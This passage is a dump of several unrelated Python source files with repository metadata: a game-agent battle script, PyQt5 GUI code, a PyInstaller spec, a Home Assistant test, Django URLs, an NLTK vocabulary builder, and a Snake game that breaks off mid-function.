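#     from sklearn.ensemble import RandomForestRegressor
#     from sklearn.model_selection import KFold, cross_val_score
#     from sklearn.preprocessing import StandardScaler
#     X = np.random.rand(200, 5)
#     y = X @ np.array([1.0, 2.0, 0.0, -1.0, 0.5]) + 0.1 * np.random.randn(200)
#     Xs = StandardScaler().fit_transform(X)
#     scores = cross_val_score(RandomForestRegressor(), Xs, y,
#                              cv=KFold(n_splits=5, shuffle=True))
#     print(scores, scores.mean())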
|
[
"14499382@qq.com"
] |
14499382@qq.com
|
45ee8e725516dbf7e4470dd77fffccc3827108a8
|
98897a706b48f40ac34cf6d1722e086bd87043ff
|
/analysis_everglades/game_logic/test_battle.py
|
fa4026e51646220353ca57eb39ad74a07ab9862b
|
[] |
no_license
|
shaunhyp57/everglades
|
dae28fb1695443fb6bb0a1e7c81d50b320dba400
|
e4aab93d7fe8147ed3917605b2755ed429884b84
|
refs/heads/master
| 2022-04-25T03:07:24.999084
| 2020-04-27T16:32:12
| 2020-04-27T16:32:12
| 238,527,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,750
|
py
|
## Static Imports
import os
import importlib
import gym
import gym_everglades
import pdb
import numpy as np
from everglades_server import server
## Input Variables
# Agent files must include a class of the same name with a 'get_action' function
# Do not include './' in file path
agent0_file = 'agents/base_rushV1.py'
#agent1_file = 'agents/same_commands.py'
agent1_file = 'agents/random_actions.py'
config_dir = 'config/'
map_file = config_dir + 'DemoMap.json'
setup_file = config_dir + 'GameSetup.json'
unit_file = config_dir + 'UnitDefinitions.json'
output_dir = 'game_telemetry/'
debug = 1
## Specific Imports
agent0_name, agent0_extension = os.path.splitext(agent0_file)
agent0_mod = importlib.import_module(agent0_name.replace('/','.'))
agent0_class = getattr(agent0_mod, os.path.basename(agent0_name))
agent1_name, agent1_extension = os.path.splitext(agent1_file)
agent1_mod = importlib.import_module(agent1_name.replace('/','.'))
agent1_class = getattr(agent1_mod, os.path.basename(agent1_name))
## Main Script
env = gym.make('everglades-v0')
players = {}
names = {}
players[0] = agent0_class(env.num_actions_per_turn, 0)
names[0] = agent0_class.__name__
players[1] = agent1_class(env.num_actions_per_turn, 1)
names[1] = agent1_class.__name__
observations = env.reset(
players=players,
config_dir = config_dir,
map_file = map_file,
unit_file = unit_file,
output_dir = output_dir,
pnames = names,
debug = debug
)
actions = {}
## Game Loop
done = 0
while not done:
if debug:
env.game.debug_state()
for pid in players:
actions[pid] = players[pid].get_action( observations[pid] )
observations, reward, done, info = env.step(actions)
print(reward)
|
[
"shaunhyp57@knights.ucf.edu"
] |
shaunhyp57@knights.ucf.edu
|
cc5c849e8b995ce39d61d9943324e59b7c3290cd
|
553cced42ec61dc58753a6cc3e108a7c0695962c
|
/04-QWidget-焦点控制.py
|
c17715f3bc0b0c6c447b62bc46d218cd2e8b0116
|
[] |
no_license
|
dongsen2019/pyqt5
|
4023bbff61310e6f2cf92cbdf5d4d960a7705f4c
|
a5c166d28718119bdd2d1c2a2860e3dfeb936414
|
refs/heads/master
| 2023-01-29T22:24:50.702505
| 2020-12-13T12:01:55
| 2020-12-13T12:01:55
| 300,865,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,265
|
py
|
# 0. Import the required packages and modules
from PyQt5.Qt import *
import sys
class Window(QWidget):
    def mousePressEvent(self, evt):
        # print(self.focusWidget())
        # self.focusNextChild()
        # self.focusPreviousChild()
        self.focusNextPrevChild(True)
        """
        focusWidget()          returns the child widget inside this window that currently has focus
        focusNextChild()       moves focus to the next child widget
        focusPreviousChild()   moves focus to the previous child widget
        focusNextPrevChild(True)   True: next,  False: previous
        """
# 1. Create an application object
app = QApplication(sys.argv)
# 2. Widget operations
# 2.1 Create the widget
window = Window()
# 2.2 Configure the widget
window.setWindowTitle("Focus Control")
window.resize(500, 500)
le1 = QLineEdit(window)
le1.move(50, 50)
le2 = QLineEdit(window)
le2.move(100, 100)
le3 = QLineEdit(window)
le3.move(150, 150)
"""
默认情况下,点击鼠标和按下键盘来获取或者切换焦点
"""
# 注意这是静态类方法
QWidget.setTabOrder(le1, le3)
QWidget.setTabOrder(le3, le2)
"""
设置子控件获取焦点的先后顺序
"""
# le2.setFocus() 设置le2为打开界面时默认获取的焦点
# le2.setFocusPolicy(Qt.TabFocus)
# le2.setFocusPolicy(Qt.ClickFocus)
# le2.setFocusPolicy(Qt.StrongFocus)
# le2.setFocusPolicy(Qt.NoFocus)
"""
设置焦点策略:
setFocusPolicy(Qt.TabFocus) 通过Tab键获得焦点
setFocusPolicy(Qt.ClickFocus) 通过被单击获得焦点
setFocusPolicy(Qt.StrongFocus) 可通过上面两种方式获得焦点
Qt.NoFocus 不能通过上两种方式获得焦点(打开界面后默认情况下),setFocus仍可使其获得焦点
"""
# le2.setFocus() 设置为焦点
# le2.clearFocus() 取消焦点
# 2.3 展示控件
window.show()
# print(le1)
# print(le2)
# print(le3)
# le2.setFocus()
# get the child widget that currently has focus inside this window
"""
The line edits only receive focus after the code below runs, so the print here shows None;
but if the focus is set after the window is shown, it can be printed:
window.show()
# print(le1)
# print(le2)
# print(le3)
# le2.setFocus()
"""
# print(window.focusWidget())
# le1.clearFocus()
# 3. Run the application and enter the message (event) loop
sys.exit(app.exec_())
|
[
"378250523@qq.com"
] |
378250523@qq.com
|
5311ad2fb6847110b4a1606ef629ada8e3ae8b27
|
688ae097a1f413f82c4a4f2840153e261a8504d4
|
/main.spec
|
c69f5a6d2fd675096c0caa96c2e7cf7cb3a26355
|
[
"MIT"
] |
permissive
|
Danverr/DeliveryCalc
|
f1225401db3e47733199044800f6752c06933550
|
c4384fc2a991817e09707288006937bd45183d71
|
refs/heads/master
| 2020-09-16T01:53:49.359474
| 2019-11-23T16:12:38
| 2019-11-23T16:12:38
| 223,615,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,240
|
spec
|
# -*- mode: python -*-
block_cipher = None
a = Analysis(['DeliveryCalc.py'],
pathex=['.'],
binaries=[],
hiddenimports=['Code/*.pyd'],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
Key = ['mkl','libopenblas']
def remove_from_list(input, keys):
outlist = []
for item in input:
name, _, _ = item
flag = 0
for key_word in keys:
if name.find(key_word) > -1:
flag = 1
if flag != 1:
outlist.append(item)
return outlist
a.binaries = remove_from_list(a.binaries, Key)
exe = EXE(pyz,
a.scripts,
exclude_binaries=True,
name='DeliveryCalc',
debug=False,
strip=False,
upx=True,
console=True )
coll = COLLECT(exe,
a.binaries,
a.zipfiles,
a.datas,
strip=False,
upx=True,
name='DeliveryCalc')
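# --- Note (editor's addition): build with `pyinstaller main.spec`. The
# remove_from_list() hook above strips bundled binaries whose names contain any
# keyword in Key (MKL / OpenBLAS libraries) to shrink the distribution. Also
# note that hiddenimports expects importable module names; a path glob such as
# 'Code/*.pyd' is likely ignored by PyInstaller.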
|
[
"noreply@github.com"
] |
Danverr.noreply@github.com
|
dcfd08920d5d8dc25f09f1674d7a69c10ecedbb1
|
1bed2f766620acf085ed2d7fd3e354a3482b8960
|
/tests/components/sensibo/test_entity.py
|
818d9ddb92499f60c743ebd9a3a8e50177e03817
|
[
"Apache-2.0"
] |
permissive
|
elupus/home-assistant
|
5cbb79a2f25a2938a69f3988534486c269b77643
|
564150169bfc69efdfeda25a99d803441f3a4b10
|
refs/heads/dev
| 2023-08-28T16:36:04.304864
| 2022-09-16T06:35:12
| 2022-09-16T06:35:12
| 114,460,522
| 2
| 2
|
Apache-2.0
| 2023-02-22T06:14:54
| 2017-12-16T12:50:55
|
Python
|
UTF-8
|
Python
| false
| false
| 2,826
|
py
|
"""The test for the sensibo entity."""
from __future__ import annotations
from unittest.mock import patch
from pysensibo.model import SensiboData
import pytest
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
)
from homeassistant.components.sensibo.const import SENSIBO_ERRORS
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import device_registry as dr, entity_registry as er
async def test_entity(
hass: HomeAssistant, load_int: ConfigEntry, get_data: SensiboData
) -> None:
"""Test the Sensibo climate."""
state1 = hass.states.get("climate.hallway")
assert state1
dr_reg = dr.async_get(hass)
dr_entries = dr.async_entries_for_config_entry(dr_reg, load_int.entry_id)
dr_entry: dr.DeviceEntry
for dr_entry in dr_entries:
if dr_entry.name == "Hallway":
assert dr_entry.identifiers == {("sensibo", "ABC999111")}
device_id = dr_entry.id
er_reg = er.async_get(hass)
er_entries = er.async_entries_for_device(
er_reg, device_id, include_disabled_entities=True
)
er_entry: er.RegistryEntry
for er_entry in er_entries:
if er_entry.name == "Hallway":
assert er_entry.unique_id == "Hallway"
@pytest.mark.parametrize("p_error", SENSIBO_ERRORS)
async def test_entity_failed_service_calls(
hass: HomeAssistant,
p_error: Exception,
load_int: ConfigEntry,
get_data: SensiboData,
) -> None:
"""Test the Sensibo send command with error."""
state = hass.states.get("climate.hallway")
assert state
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
side_effect=p_error,
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
|
[
"noreply@github.com"
] |
elupus.noreply@github.com
|
deb20b06a842a226505f4352f62729b0865cad89
|
f0463eba4010126fc0574945c2f9b2cd6eb40cff
|
/Component/Windows.py
|
f5c0b35c5e82f1d6668ba09e042bf92cf2805776
|
[] |
no_license
|
Choewonyeong/Standard_Project3
|
b572c3fbf2ac379980b95d7247c867f092b7a09d
|
155903d450c1da7355914c72aa07b8f23a03e336
|
refs/heads/master
| 2022-06-21T18:51:42.766380
| 2020-05-08T00:28:04
| 2020-05-08T00:28:04
| 262,183,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,657
|
py
|
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon, QPixmap
from PyQt5.QtWidgets import QWidget, QAction, QMenu, QMenuBar, QLineEdit
from PyQt5.QtWidgets import QDialog, QTableWidget, QTableWidgetItem, QLabel
from PyQt5.QtWidgets import QMessageBox, QComboBox, QTabWidget, QFileDialog
from PyQt5.QtWidgets import QFormLayout, QPushButton, QVBoxLayout, QHBoxLayout
from Component.Shortcut import Shortcut
from Component.Materials import Checkbox
from Component.Materials import CheckboxItem
from Component.Projects.AreaTab import AreaTab
from Component.Projects.CableTab import CableTab
from Component.Projects.EquipTab import EquipTab
from Component.Projects.LogicTap import LogicTab
from Component.Projects.AnalysTab import AnalysTab
from Component.Project import Project
from Excel.Import import Import
from Excel.Export import Export
import shutil
import os
__author__ = "Wonyeong Choe <choewy@stdte.co.kr>"
class Windows(QWidget):
def __init__(self):
QWidget.__init__(self)
self.dirs = ['']+os.listdir('Data')
self.dirs.remove('Origin')
self.db_name = ''
self.__setting__()
self.__component__()
def __setting__(self):
self.setWindowTitle('원전 MSO, SSA 분석 프로그램')
self.setMinimumWidth(800)
self.setMinimumHeight(800)
self.geometry().center()
self.showMaximized()
self.setWindowIcon(QIcon('icon.ico'))
def __component__(self):
self.__menubar__()
self.__combobox__()
self.__pushbutton__()
self.__tab__()
self.__layout__()
def __menubar__(self):
action_version = QAction('프로그램 정보', self)
self.action_shortcut = QAction('단축키 정보', self)
action_exit = QAction('닫기', self)
action_exit.setShortcut('Ctrl+Q')
action_version.triggered.connect(self.Version)
self.action_shortcut.triggered.connect(self.Shortcut)
action_exit.triggered.connect(self.Exit)
menu_main = QMenu('메뉴', self)
menu_main.addAction(action_version)
menu_main.addAction(self.action_shortcut)
menu_main.addSeparator()
menu_main.addAction(action_exit)
action_new = QAction('새 프로젝트', self)
action_new.setShortcut('Ctrl+N')
action_admin = QAction('프로젝트 관리', self)
action_admin.setShortcut('Ctrl+M')
action_refresh = QAction('새로고침', self)
action_refresh.setShortcut('F5')
action_new.triggered.connect(self.New)
action_admin.triggered.connect(self.Admin)
action_refresh.triggered.connect(self.Refresh)
menu_project = QMenu('프로젝트', self)
menu_project.addAction(action_new)
menu_project.addAction(action_admin)
menu_project.addAction(action_refresh)
self.menubar = QMenuBar(self)
self.menubar.addMenu(menu_main)
self.menubar.addMenu(menu_project)
def New(self):
self.lineedit_project = QLineEdit()
self.button_close = QPushButton('닫기')
self.button_create = QPushButton('생성')
self.button_create.setDefault(True)
self.button_close.clicked.connect(self.Close)
self.button_create.clicked.connect(self.Create)
layout_form = QFormLayout()
layout_form.addRow('프로젝트 명', self.lineedit_project)
layout_buttons = QHBoxLayout()
layout_buttons.addWidget(self.button_close)
layout_buttons.addWidget(self.button_create)
layout = QVBoxLayout()
layout.addLayout(layout_form)
layout.addLayout(layout_buttons)
self.dig = QDialog(self)
self.dig.setLayout(layout)
self.dig.setFixedWidth(300)
self.dig.setFixedHeight(100)
self.dig.setWindowTitle('새 프로젝트 생성')
self.dig.exec_()
def __checkbox__(self, table, row, col):
checkboxitem = CheckboxItem()
checkbox = Checkbox(checkboxitem)
checkbox.stateChanged.connect(self.Checked)
table.setItem(row, col, checkboxitem)
table.setCellWidget(row, col, checkbox)
def Checked(self, check):
row = self.table.currentRow()
if check == 2:
self.checked.append(row)
elif check == 0:
self.checked.remove(row)
def Admin(self):
self.checked = []
dirs = ['']+os.listdir('Data')
dirs.remove('Origin')
action_close = QAction('닫기')
action_close.triggered.connect(self.CloseProject)
action_delete = QAction('삭제')
action_delete.setShortcut('Alt+2')
action_delete.triggered.connect(self.DeleteProject)
menubar = QMenuBar()
menubar.addAction(action_close)
menubar.addAction(action_delete)
self.table = QTableWidget()
self.table.setRowCount(0)
self.table.setColumnCount(len(['선택', '프로젝트명']))
self.table.setHorizontalHeaderLabels(['선택', '프로젝트명'])
style = "QTableWidget{color: black;}"
self.table.setStyleSheet(style)
for row, project in enumerate(dirs):
self.table.insertRow(row)
self.table.setRowHeight(row, 50)
self.__checkbox__(self.table, row, 0)
item = QTableWidgetItem(project)
item.setFlags(Qt.ItemIsEditable)
self.table.setItem(row, 1, item)
self.table.resizeColumnsToContents()
self.table.hideRow(0)
self.table.verticalHeader().setVisible(False)
self.table.horizontalHeader().setStretchLastSection(True)
layout = QVBoxLayout()
layout.addWidget(menubar)
layout.addWidget(self.table)
self.dig_project = QDialog(self)
self.dig_project.setLayout(layout)
self.dig_project.setWindowTitle('프로젝트 관리')
self.dig_project.setFixedWidth(400)
self.dig_project.setFixedHeight(800)
self.dig_project.exec_()
def CloseProject(self):
self.dig_project.close()
def DeleteProject(self):
self.checked.sort(reverse=True)
for row in self.checked:
project = self.table.item(row, 1).text()
index = self.dirs.index(project)
current = f"Data/{project}"
shutil.rmtree(current)
self.combobox_project.removeItem(index)
self.dirs.remove(project)
self.table.removeRow(row)
self.checked.clear()
def Refresh(self):
index = self.project.currentIndex()
self.project.clear()
self.project.addTab(AreaTab(self.db_name, self, self.Refresh), '방화지역')
self.project.addTab(EquipTab(self.db_name, self, self.Refresh), '기기')
self.project.addTab(CableTab(self.db_name, self, self.Refresh), '케이블')
self.project.addTab(LogicTab(self.db_name, self, self.Refresh), '논리')
self.project.addTab(AnalysTab(self.db_name, self, self.Refresh), '분석')
self.project.setCurrentIndex(index)
def Version(self):
pixmap = QPixmap('logo.png').scaledToWidth(300)
label_logo = QLabel()
label_logo.setPixmap(pixmap)
label_logo.setAlignment(Qt.AlignCenter)
label_title = QLabel('<h3>원전 MSO, SSA 분석 프로그램 V1.0</h3>')
label_title.setAlignment(Qt.AlignCenter)
layout_head = QVBoxLayout()
layout_head.addWidget(QLabel('소 속 :'))
layout_head.addWidget(QLabel('개 발 자 :'))
layout_head.addWidget(QLabel('제 작 일 :'))
layout_head.addWidget(QLabel('개 요 :'))
layout_head.addWidget(QLabel(''))
layout_content = QVBoxLayout()
layout_content.addWidget(QLabel('(주)스탠더드시험연구소'))
layout_content.addWidget(QLabel('최원영'))
layout_content.addWidget(QLabel('2019-06-10'))
layout_content.addWidget(QLabel('본 프로그램은 (주)스탠더드시험연구소에서 자체적으로 개발한'))
layout_content.addWidget(QLabel('원전 다중오동작(MSO), 안전정지(SSA) 분석을 위한 프로그램입니다.'))
layout_info = QHBoxLayout()
layout_info.addLayout(layout_head)
layout_info.addLayout(layout_content)
layout = QVBoxLayout()
layout.addWidget(label_title)
layout.addWidget(QLabel(''))
layout.addLayout(layout_info)
layout.addWidget(QLabel(''))
layout.addWidget(label_logo)
self.dig_version = QDialog(self)
self.dig_version.setStyleSheet('QDialog{background: white;}')
self.dig_version.setWindowTitle('프로그램 정보')
self.dig_version.setLayout(layout)
self.dig_version.setFixedWidth(460)
self.dig_version.setFixedHeight(280)
self.dig_version.exec_()
def Shortcut(self):
idx = self.tab.count()
self.tab.addTab(Shortcut(), '단축키 정보')
self.tab.setCurrentIndex(idx)
self.action_shortcut.setEnabled(False)
def Exit(self):
self.close()
def Create(self):
db_name = self.lineedit_project.text()
if db_name == '':
QMessageBox.question(self, '오류', '프로젝트 이름을 입력하세요.', QMessageBox.Close)
elif os.path.isdir(f"Data/{db_name}"):
QMessageBox.question(self, '오류', '이미 존재하는 프로젝트입니다.', QMessageBox.Close)
elif db_name != '':
self.dirs.append(db_name)
origin = os.listdir("Data/Origin")
os.makedirs(f"Data/{db_name}")
for index, db in enumerate(origin):
origin_db = f"Data/Origin/{db}"
new_db = f"Data/{db_name}/{db}"
shutil.copy(origin_db, new_db)
self.dig.close()
self.combobox_project.addItems([f'{db_name}'])
def Close(self):
self.dig.close()
def __combobox__(self):
self.combobox_project = QComboBox()
self.combobox_project.addItems(self.dirs)
def __pushbutton__(self):
self.button_project = QPushButton('열기')
self.button_project.clicked.connect(self.Open)
self.button_import = QPushButton('업로드')
self.button_import.clicked.connect(self.Import)
self.button_import.setVisible(False)
self.button_export = QPushButton('다운로드')
self.button_export.clicked.connect(self.Export)
self.button_export.setVisible(False)
def Open(self):
self.db_name = self.combobox_project.currentText()
count = self.tab.count()
tab_bars = []
if count != 0:
for idx in range(count):
text = self.tab.tabText(idx)
tab_bars.append(text)
if self.db_name == '':
self.button_import.setVisible(False)
self.button_export.setVisible(False)
elif self.db_name != '' and self.db_name not in tab_bars:
self.project = Project(self.db_name, self.Refresh)
self.tab.addTab(self.project, self.db_name)
self.tab.setCurrentIndex(self.tab.currentIndex()+1)
self.button_import.setVisible(True)
self.button_export.setVisible(True)
self.button_import.setShortcut('Ctrl+I')
self.button_export.setShortcut('Ctrl+E')
def Import(self):
dig_file = QFileDialog(self)
file_name = dig_file.getOpenFileName(self, caption='엑셀 파일 업로드', directory='', filter='*.xlsx')[0]
if file_name != '':
try:
db_path = f"Data/{self.db_name}"
shutil.rmtree(db_path)
os.makedirs(db_path)
Import(self.db_name, file_name)
self.Refresh()
except Exception:
QMessageBox.question(self, '오류', '업로드에 실패하였습니다.\n엑셀 파일의 양식을 확인하세요.', QMessageBox.Close)
def Export(self):
dig_dirs = QFileDialog(self)
file_path = dig_dirs.getSaveFileName(caption='엑셀 파일 다운로드', directory='', filter='*.xlsx')[0]
if file_path != '':
Export(self.db_name, file_path)
self.Refresh()
self.__success_export__(file_path)
def __success_export__(self, file_path):
label_text = QLabel('다운로드가 완료되었습니다.\n')
label_text.setAlignment(Qt.AlignCenter)
self.file_path = file_path
self.button_ignore = QPushButton('닫기')
self.button_open = QPushButton('열기')
self.button_ignore.clicked.connect(self.Ignore_ExcelFile)
self.button_open.clicked.connect(self.Open_ExcelFile)
layout_button = QHBoxLayout()
layout_button.addWidget(self.button_ignore)
layout_button.addWidget(self.button_open)
layout = QVBoxLayout()
layout.addWidget(label_text)
layout.addLayout(layout_button)
self.dig_export = QDialog(self)
self.dig_export.setLayout(layout)
self.dig_export.setWindowTitle('알림')
style = "QDialog{background-color: white;}"
self.dig_export.setFixedWidth(300)
self.dig_export.setFixedHeight(150)
self.dig_export.setStyleSheet(style)
self.dig_export.show()
def Ignore_ExcelFile(self):
self.dig_export.close()
def Open_ExcelFile(self):
os.system(f"start excel.exe {self.file_path}")
self.dig_export.close()
def __tab__(self):
self.tab = QTabWidget()
self.tab.setMovable(True)
self.tab.setTabsClosable(True)
self.tab.tabCloseRequested.connect(self.CloseTab)
def CloseTab(self, index):
self.tab.removeTab(index)
tab_name = self.tab.tabText(index)
if tab_name == '단축키 정보':
self.action_shortcut.setEnabled(True)
def __layout__(self):
layout_project = QHBoxLayout()
layout_project.addWidget(QLabel(' 프로젝트 선택'))
layout_project.addWidget(self.combobox_project, 5)
layout_project.addWidget(self.button_project, 0)
layout_excelfile = QHBoxLayout()
layout_excelfile.addWidget(QLabel(''), 10)
layout_excelfile.addWidget(self.button_import, 1)
layout_excelfile.addWidget(self.button_export, 1)
layout_top = QHBoxLayout()
layout_top.addLayout(layout_project, 5)
layout_top.addLayout(layout_excelfile, 5)
layout = QVBoxLayout()
layout.addWidget(self.menubar, 0)
layout.addLayout(layout_top, 0)
layout.addWidget(self.tab, 10)
self.setLayout(layout)
|
[
"choewy@stdte.co.kr"
] |
choewy@stdte.co.kr
|
1c08ed7ab24404b2203e81b4ad894448a0dedbfd
|
efd4e7d85e2ae17853513e846ffce08288e3ff7b
|
/My_profile/urls.py
|
2abf6fd7317aee120b4a64f0256870f5a5802713
|
[] |
no_license
|
bodawalan/Django_blog
|
e033bbb5547f17b668f2a582f71700f4a1353184
|
43b9505708a18dbb9da28cad020f1ae90d5a0e0e
|
refs/heads/master
| 2021-01-19T11:29:42.448736
| 2017-04-12T20:06:21
| 2017-04-12T20:06:21
| 87,970,789
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 268
|
py
|
from django.conf.urls import url,include
from django.contrib import admin
from My_profile import views
urlpatterns = [
#url(r'^', views.Name_view),
url(r'^address', views.Address_view),
url(r'^contact', views.contact),
url(r'^', views.Name_view),
]
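# Note on ordering: these regexes are matched top to bottom and r'^'
# matches every request, so the catch-all Name_view route must stay
# last or it would shadow the address and contact routes.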
|
[
"nishit687539@gmail.com"
] |
nishit687539@gmail.com
|
d8620bee26ddf112e526f48d44d148a31175bc96
|
87fe3804869e2443c14317d766a5f8716afcd5d5
|
/scripts/form_vocab.py
|
91f0f437c6d7c6af9304603454eb1f3585f4c7c5
|
[] |
no_license
|
heidonomm/mhopRL
|
dbfd296dddf87507f6bb19d58b459a4df181ea57
|
93db4dda4646412f1783a6e05f9b779005539a2f
|
refs/heads/master
| 2023-04-15T04:56:44.464898
| 2021-04-16T07:29:20
| 2021-04-16T07:29:20
| 344,776,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,936
|
py
|
import nltk
from nltk import word_tokenize
from nltk import WordNetLemmatizer
import json
import string
# q_string = '{"id": "3NGI5ARFTT4HNGVWXAMLNBMFA0U1PG", "question": {"stem": "Climate is generally described in terms of what?", "choices": [{"text": "sand", "label": "A"}, {"text": "occurs over a wide range", "label": "B"}, {"text": "forests", "label": "C"}, {"text": "Global warming", "label": "D"}, {"text": "rapid changes occur", "label": "E"}, {"text": "local weather conditions", "label": "F"}, {"text": "measure of motion", "label": "G"}, {"text": "city life", "label": "H"}]}, "answerKey": "F", "fact1": "Climate is generally described in terms of temperature and moisture.", "fact2": "Fire behavior is driven by local weather conditions such as winds, temperature and moisture.", "combinedfact": "Climate is generally described in terms of local weather conditions", "formatted_question": "Climate is generally described in terms of what? (A) sand (B) occurs over a wide range (C) forests (D) Global warming (E) rapid changes occur (F) local weather conditions (G) measure of motion (H) city life"}'
# q_json = json.loads(q_string)
# def state_rep_generator(q_obj):
# state = ""
# elements = list()
# elements.append(preprocess(q_obj["stem"]))
# for choice in q_obj['choices']:
# print(choice['text'])
# elements.append((preprocess(choice['text'])))
# print(elements)
# return "<|>".join(elements)
def preprocess(text):
lemma = WordNetLemmatizer()
tokens = word_tokenize(text)
tokens = [token for token in tokens if token.isalpha()]
tokens = [lemma.lemmatize(word.lower(), pos="v") for word in tokens]
tokens = [lemma.lemmatize(word.lower(), pos="n") for word in tokens]
return tokens
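# A rough usage sketch (the sentence below is an illustrative assumption,
# not taken from the dataset): tokens are lowercased, non-alphabetic
# tokens dropped, then verb- and noun-lemmatized, so approximately:
# preprocess("Climate is generally described in terms of winds")
# -> ['climate', 'be', 'generally', 'describe', 'in', 'term', 'of', 'wind']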
# print(state_rep_generator(q_json['question']))
vocab_set = set()
for letter in string.ascii_lowercase:
vocab_set.add(letter)
# with open("data/QASC_Dataset/dev.jsonl", "r") as in_dev_file, open("toy_data/dev_norm_unique_predicates.txt", "r") as in_pred_file, open("word_vocab.txt", "w") as out_file:
# for line in in_dev_file:
# line = json.loads(line)
# for stem_word in preprocess(line["question"]["stem"]):
# vocab_set.add(stem_word)
# # vocab_set.add(word for word in preprocess(line["question"]["stem"]))
# # choices = [preprocess(choice["text"]) for choice in line["question"]["choices"]]
# for choice in line["question"]["choices"]:
# for choice_word in preprocess(choice["text"]):
# vocab_set.add(choice_word)
# # vocab_set.add(word for word in preprocess(choice["text"]))
# for index, line in enumerate(in_pred_file):
# for word in preprocess(line):
# vocab_set.add(word)
# # vocab_set.add(word for word in preprocess(line))
# for word in vocab_set:
# # print(word)
# out_file.write(f"{word}\n")
|
[
"heidonomm@gmail.com"
] |
heidonomm@gmail.com
|
905d02d242aba18398fcd2c714f97a9507bde437
|
424c3cff38aab3895a277de6a08dc0592ecd42e7
|
/main.py
|
44158692bb56951d5b8312b0c986e74fc8eb21bf
|
[] |
no_license
|
kevinjavila/Snake-Game
|
90718497961d92c268da8ebd5255eb080cc975d2
|
78bc5ba524662209a2a95510839bcd52f7b322c1
|
refs/heads/master
| 2023-08-26T06:57:57.485186
| 2021-10-26T21:05:07
| 2021-10-26T21:05:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,748
|
py
|
import random
import pygame
class Cube:
rows = 20
w = 500
def __init__(self, start, dirnx = 1, dirny = 0, color = (255, 0, 0)):
self.pos = start
# Use the constructor arguments for the initial direction
self.dirnx = dirnx
self.dirny = dirny
self.color = color
def move(self, dirnx, dirny):
self.dirnx = dirnx
self.dirny = dirny
self.pos = (self.pos[0] + self.dirnx, self.pos[1] + self.dirny)
def draw(self, surface, eyes = False):
dis = self.w // self.rows
i = self.pos[0]
j = self.pos[1]
pygame.draw.rect(surface, self.color, (i*dis+1, j*dis+1, dis - 2, dis - 2)) # Drawing inside squares
if eyes:
center = dis // 2
radius = 3
circle_middle = (i*dis+center-radius, j*dis+8)
circle_middle1 = (i*dis+dis-radius*2, j*dis+8)
pygame.draw.circle(surface, (0,0,0), circle_middle, radius)
pygame.draw.circle(surface, (0,0,0), circle_middle1, radius)
class Snake:
body = []
turns = {}
def __init__(self, color, pos):
self.color = color
# Keeping track of head at position
self.head = Cube(pos)
self.body.append(self.head)
# Directions for moving snake
self.dirnx = 0
self.dirny = 1
def move(self):
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
# Holding the key values that can be pressed
keys = pygame.key.get_pressed()
if keys[pygame.K_LEFT]:
self.dirnx = -1
self.dirny = 0
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
elif keys[pygame.K_RIGHT]:
self.dirnx = 1
self.dirny = 0
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
elif keys[pygame.K_UP]:
self.dirnx = 0
self.dirny = -1
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
elif keys[pygame.K_DOWN]:
self.dirnx = 0
self.dirny = 1
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
for i, c in enumerate(self.body):
p = c.pos[:] # position
if p in self.turns:
turn = self.turns[p]
c.move(turn[0], turn[1])
# If on last cube, remove turn
if i == len(self.body) - 1:
self.turns.pop(p)
else:
# Checking whether we are on edge of screen
if c.dirnx == -1 and c.pos[0] <= 0: # if on left side edge, come through right side edge
c.pos = (c.rows - 1, c.pos[1])
elif c.dirnx == 1 and c.pos[0] >= c.rows - 1: # if on right side edge, come through left side
c.pos = (0, c.pos[1])
elif c.dirny == 1 and c.pos[1] >= c.rows - 1: # if on down side edge, come through up side edge
c.pos = (c.pos[0], 0)
elif c.dirny == -1 and c.pos[1] <= 0: # if on up side edge, come through down side edge
c.pos = (c.pos[0], c.rows - 1)
else:
c.move(c.dirnx, c.dirny) # else keep moving
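# How the turn replay works: when the head changes direction at grid
# cell (x, y), that cell is recorded in self.turns, and each body cube
# applies the stored turn when it later reaches the same cell. For
# example, after a left turn at (5, 5), turns == {(5, 5): [-1, 0]}
# until the tail passes through (5, 5) and the entry is popped.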
def add_cube(self):
tail = self.body[-1]
dx, dy = tail.dirnx, tail.dirny
# Checking direction of the tail so cube can be added properly
if dx == 1 and dy == 0:
self.body.append(Cube((tail.pos[0] - 1, tail.pos[1]))) # Right
elif dx == -1 and dy == 0:
self.body.append(Cube((tail.pos[0] + 1, tail.pos[1]))) # Left
